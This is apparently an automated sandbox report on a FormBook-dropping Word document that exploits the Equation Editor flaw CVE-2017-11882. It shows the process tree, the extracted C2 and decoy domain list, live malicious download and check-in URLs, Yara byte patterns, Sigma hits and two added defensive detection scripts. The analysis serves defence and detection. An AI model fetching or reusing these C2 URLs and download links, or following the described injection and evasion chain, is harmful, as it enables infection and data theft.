

Windows Analysis Report PO789.doc

Overview

General Information

Sample Name: PO789.doc
Analysis ID: 552782
MD5: 6c28e31d32e97db724188025636ac25e
SHA1: c5818d1883785293dfab00d2c1389b82cc74ad60
SHA256: c24d7ca6493677f640cf6d4a90c746f949749f46e45873d77a71b94ab707a21f
Tags: doc, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2644 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1124 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • medicomsh78694.exe (PID: 2824 cmdline: C:\Users\user\AppData\Roaming\medicomsh78694.exe MD5: 8807C2E0F2973A22812AF6E61BA72667)
      • medicomsh78694.exe (PID: 2008 cmdline: {path} MD5: 8807C2E0F2973A22812AF6E61BA72667)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msdt.exe (PID: 2848 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: F67A64C46DE10425045AF682802F5BA6)
            • cmd.exe (PID: 448 cmdline: /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.carbonfiber.cloud/md4m/"], "decoy": ["thegreenroomak.net", "boxingforfitness.info", "hynejubelured.com", "elektrocentralybenza.online", "getinteriorsolution.com", "ajctrade.ltd", "boytoyporn.com", "charlotteetlachocolaterie.fr", "martens-suomi.com", "colesfax.com", "laksmanawarehouse.com", "extraordinarymiracle.com", "hunttools.info", "ofertasdesuvsinfosmex.com", "banphimipad.com", "jingjiguanchabao.com", "keepourassets.com", "haveitmore.com", "bleuredmedia.com", "hsgerontech.com", "mms05.xyz", "994671.com", "xsbjbj.com", "syxinyu.com", "costnergroups.com", "muzicalbox.com", "kkstudy.net", "picguru.pro", "avtokitai.store", "artplay.xyz", "4-sidedirect.com", "wa1315.xyz", "pelicancrs.com", "cozastore.net", "maatia.com", "movistar.money", "clickprintus.com", "oblatz.com", "mood-room.com", "erisibu85.com", "bzhjxf.com", "mdcomfortukraine.store", "timo-music.com", "vinovai.xyz", "danielkcarter.store", "segurodevidacovid.com", "somoslaostra.com", "businessis.business", "wholisticard.com", "dummydomain234543.com", "realstakepool.com", "rs23.club", "emobilemarket.com", "mabsfuse.com", "lastra41.com", "safbilgi.com", "prestigiousuniforms.com", "outerverse.space", "formuladushi.online", "yt3013.xyz", "therestaurant.menu", "lentellas.com", "rutube.cloud", "mywhitelotus.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(30 entries in the full table; the remaining memory-dump matches are collapsed in the original report)

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.medicomsh78694.exe.3221198.4.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.medicomsh78694.exe.3221198.4.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x83e38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x841d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0xabc58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0xabff2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8fee5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0xb7d05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x8f9d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0xb77f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x8ffe7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0xb7e07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x9015f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb7f7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x84bea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0xaca0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x8ec4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb6a6c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x85962:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0xad782:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x953d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0xbd1f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x9647a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.medicomsh78694.exe.3221198.4.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x92309:$sqlite3step: 68 34 1C 7B E1
        • 0x9241c:$sqlite3step: 68 34 1C 7B E1
        • 0xba129:$sqlite3step: 68 34 1C 7B E1
        • 0xba23c:$sqlite3step: 68 34 1C 7B E1
        • 0x92338:$sqlite3text: 68 38 2A 90 C5
        • 0x9245d:$sqlite3text: 68 38 2A 90 C5
        • 0xba158:$sqlite3text: 68 38 2A 90 C5
        • 0xba27d:$sqlite3text: 68 38 2A 90 C5
        • 0x9234b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x92473:$sqlite3blob: 68 53 D8 7F 8C
        • 0xba16b:$sqlite3blob: 68 53 D8 7F 8C
        • 0xba293:$sqlite3blob: 68 53 D8 7F 8C
5.2.medicomsh78694.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.medicomsh78694.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(6 entries in the full table; the remaining unpacked-PE matches are collapsed in the original report)
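
The Yara tables above list, for each rule string, the offset at which it was found in a dump or unpacked PE. The two rule families work differently: Formbook_1 (yara-signator) matches short opcode sequences, and $sequence_0 decodes to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the RDTSC timing check the signature list also reports; the JPCERT/CC rule matches 5-byte push imm32 instructions whose immediates, going by the identifier names, are hashed sqlite3 API names. The script below is an added example, not the rule authors' code: it copies a few of the hex strings from the tables, plants them at chosen offsets in a constructed buffer, reports where they match, and decodes the pushed constants. The real rules' match conditions are not on the page, so the threshold is a parameter.

```python
"""Scan a buffer for the byte patterns of the FormBook Yara rules quoted in the report.

Added example, not the rule authors' or the sandbox's code. The hex strings are
copied from the report; the buffer is a constructed stand-in for a memory
dump with a few of those strings planted at known offsets. The match
conditions of the real rules are not on the page, so the threshold is a
parameter here.
"""
import re
import struct

# Formbook_1 (Felix Bilstein, yara-signator): opcode sequences. $sequence_0
# decodes to 'add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax', the RDTSC
# timing check the report also flags.
FORMBOOK_1 = {
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
# Formbook (JPCERT/CC): each string is a 'push imm32' of a 32-bit constant; the
# identifier names suggest hashed sqlite3 API names (the hash scheme is not on the page).
JPCERT = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}
RULES = {"Formbook_1": FORMBOOK_1, "Formbook": JPCERT}


def hex_to_bytes(hex_string):
    return bytes.fromhex(hex_string.replace(" ", ""))


def find_all(buf, pattern):
    """Offsets of every (possibly overlapping) occurrence of pattern in buf."""
    return [m.start() for m in re.finditer(b"(?=" + re.escape(pattern) + b")", buf)]


def scan(buf, rules=RULES):
    """{rule: {identifier: [offsets]}} for identifiers that occur at least once."""
    hits = {}
    for rule, strings in rules.items():
        for ident, hex_string in strings.items():
            offsets = find_all(buf, hex_to_bytes(hex_string))
            if offsets:
                hits.setdefault(rule, {})[ident] = offsets
    return hits


def matched_count(hits, rule):
    return len(hits.get(rule, {}))


def rule_fires(hits, rule, min_strings):
    """Stand-in for an 'N of them' condition; the real thresholds are not on the page."""
    return matched_count(hits, rule) >= min_strings


def decode_push_imm32(hex_string):
    """Turn a '68 xx xx xx xx' string into the little-endian constant it pushes."""
    code = hex_to_bytes(hex_string)
    if len(code) != 5 or code[0] != 0x68:
        raise ValueError("not a 5-byte push imm32")
    return struct.unpack("<I", code[1:])[0]


def build_sample_dump():
    """Constructed buffer: zero filler with rule strings planted at chosen offsets."""
    buf = bytearray(0x400)
    for offset, hex_string in [(0x120, FORMBOOK_1["$sequence_0"]),
                               (0x2A0, FORMBOOK_1["$sequence_0"]),
                               (0x1F0, JPCERT["$sqlite3step"]),
                               (0x1FF, JPCERT["$sqlite3text"]),
                               (0x210, JPCERT["$sqlite3blob"])]:
        code = hex_to_bytes(hex_string)
        buf[offset:offset + len(code)] = code
    return bytes(buf)


if __name__ == "__main__":
    dump = build_sample_dump()
    for rule, strings in scan(dump).items():
        for ident, offsets in strings.items():
            print(rule, ident, [hex(o) for o in offsets])
    print(hex(decode_push_imm32(JPCERT["$sqlite3step"])))
```

Against a real dump you would pass the file contents to scan() instead of build_sample_dump(); the offsets it returns are relative to the start of the dump, which is how the tables above report them.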

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 2.58.149.41, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1124, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1124, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Roaming\medicomsh78694.exe, CommandLine: C:\Users\user\AppData\Roaming\medicomsh78694.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\medicomsh78694.exe, NewProcessName: C:\Users\user\AppData\Roaming\medicomsh78694.exe, OriginalFileName: C:\Users\user\AppData\Roaming\medicomsh78694.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1124, ProcessCommandLine: C:\Users\user\AppData\Roaming\medicomsh78694.exe, ProcessId: 2824
Sigma detected: Possible Applocker Bypass
Source: Process started | Author: juju4 | Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 2848
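
The four Sigma hits above all reduce to simple predicates over Sysmon-style events: an outbound connection (EventID 3) from EQNEDT32.EXE, a file written (EventID 11) by EQNEDT32.EXE, a process (EventID 1) whose parent is EQNEDT32.EXE, and msdt.exe being started. The script below is an added example, not the rule authors' or the sandbox's code: the events are constructed from the Data fields printed in this section, the predicates are my approximation of what the named rules must check (the rule bodies are not on the page), and one benign Word event is added as a control that must not fire. Grouping hits by ProcessId shows the two Equation Editor signals landing on the same PID 1124.

```python
"""Re-create the report's EQNEDT32 Sigma hits as plain predicates over Sysmon-style events.

Added example, not the sandbox's or the rule authors' code. The events are
constructed from the 'Data:' fields the Sigma section prints; the rule
conditions are my approximation of what the named rules must check, since
the rule bodies themselves are not on the page. One benign Word event is
included as a control.
"""
from collections import defaultdict
from fnmatch import fnmatch

EQNEDT32 = r"*\EQUATION\EQNEDT32.EXE"

EVENTS = [
    # Sysmon EventID 3: Equation Editor opens an outbound TCP connection.
    {"EventID": 3, "ProcessId": 1124, "Initiated": True, "Protocol": "tcp",
     "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "DestinationIp": "2.58.149.41", "DestinationPort": 80},
    # Sysmon EventID 11: Equation Editor writes the downloaded PE to the IE cache.
    {"EventID": 11, "ProcessId": 1124,
     "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe"},
    # Sysmon EventID 1: the dropped executable is started with EQNEDT32.EXE as parent.
    {"EventID": 1, "ProcessId": 2824,
     "Image": r"C:\Users\user\AppData\Roaming\medicomsh78694.exe",
     "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "ParentProcessId": 1124},
    # Sysmon EventID 1: msdt.exe spawned by the (injected) explorer.exe.
    {"EventID": 1, "ProcessId": 2848, "Image": r"C:\Windows\SysWOW64\msdt.exe",
     "CommandLine": r"C:\Windows\SysWOW64\msdt.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentProcessId": 1764},
    # Constructed benign control (not from the report): Word writing its own temp file.
    {"EventID": 11, "ProcessId": 2644,
     "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\~WRD0000.tmp"},
]


def matches(value, pattern):
    """Case-insensitive glob, like Sigma's 'endswith' on an image path."""
    return fnmatch((value or "").lower(), pattern.lower())


def eqnedt_network(e):
    return e["EventID"] == 3 and bool(e.get("Initiated")) and matches(e.get("Image"), EQNEDT32)


def eqnedt_file_drop(e):
    return e["EventID"] == 11 and matches(e.get("Image"), EQNEDT32)


def eqnedt_child_process(e):
    return e["EventID"] == 1 and matches(e.get("ParentImage"), EQNEDT32)


def msdt_started(e):
    return e["EventID"] == 1 and matches(e.get("Image"), r"*\msdt.exe")


RULES = {
    "EQNEDT32.EXE connecting to internet": eqnedt_network,
    "File Dropped By EQNEDT32EXE": eqnedt_file_drop,
    "Droppers Exploiting CVE-2017-11882": eqnedt_child_process,
    "Possible Applocker Bypass": msdt_started,
}


def evaluate(events, rules=RULES):
    """Return (rule name, ProcessId) for every event/rule pair that fires."""
    return [(name, e["ProcessId"]) for e in events for name, pred in rules.items() if pred(e)]


def correlate(hits):
    """Group hits by ProcessId so the two Equation Editor signals land on PID 1124 together."""
    by_pid = defaultdict(list)
    for name, pid in hits:
        by_pid[pid].append(name)
    return dict(by_pid)


if __name__ == "__main__":
    for pid, names in sorted(correlate(evaluate(EVENTS)).items()):
        print(pid, names)
```

Any network connection, file write or child process from EQNEDT32.EXE is worth alerting on by itself: the Equation Editor has no legitimate reason to do any of the three, which is why these rules need no allow-listing.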

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (the C2 list and decoy list reproduced under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: PO789.doc | Virustotal: Detection: 57%
Source: PO789.doc | ReversingLabs: Detection: 53%
Yara detected FormBook
Source: Yara match | File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://peak-tv.tk/medicomzx.exe | Avira URL Cloud: Label: malware
Source: http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i | Avira URL Cloud: Label: malware
Source: http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: peak-tv.tk | Virustotal: Detection: 5%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe | Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe | ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | ReversingLabs: Detection: 51%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Joe Sandbox ML: detected
Source: 5.0.medicomsh78694.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.medicomsh78694.exe.400000.9.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.medicomsh78694.exe.400000.7.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.medicomsh78694.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr | Stream path '_1703602930/\x1CompObj': ...........................F....Microsoft Equation
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb | source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000003.421954083.0000000000540000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460764763.0000000000D20000.00000040.00000001.sdmp, medicomsh78694.exe, 00000005.00000003.422999608.00000000006A0000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, msdt.exe
Source: Binary string: msdt.pdb | source: medicomsh78694.exe, 00000005.00000003.458755540.0000000002800000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.461556761.0000000002700000.00000040.00020000.sdmp, medicomsh78694.exe, 00000005.00000003.458361756.0000000002700000.00000004.00000001.sdmp
Source: global traffic | DNS query: name: peak-tv.tk
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] (reported 6 times)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 4x nop then pop edi (reported 3 times)
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 2.58.149.41:80 (reported 2 times)

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.muzicalbox.com
Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.13 80
Source: C:\Windows\explorer.exe | Domain query: www.extraordinarymiracle.com
Source: C:\Windows\explorer.exe | Domain query: www.realstakepool.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 109.94.209.123 80
Source: C:\Windows\explorer.exe | Domain query: www.prestigiousuniforms.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.carbonfiber.cloud/md4m/
Source: Joe Sandbox View | ASN Name: GBTCLOUDUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
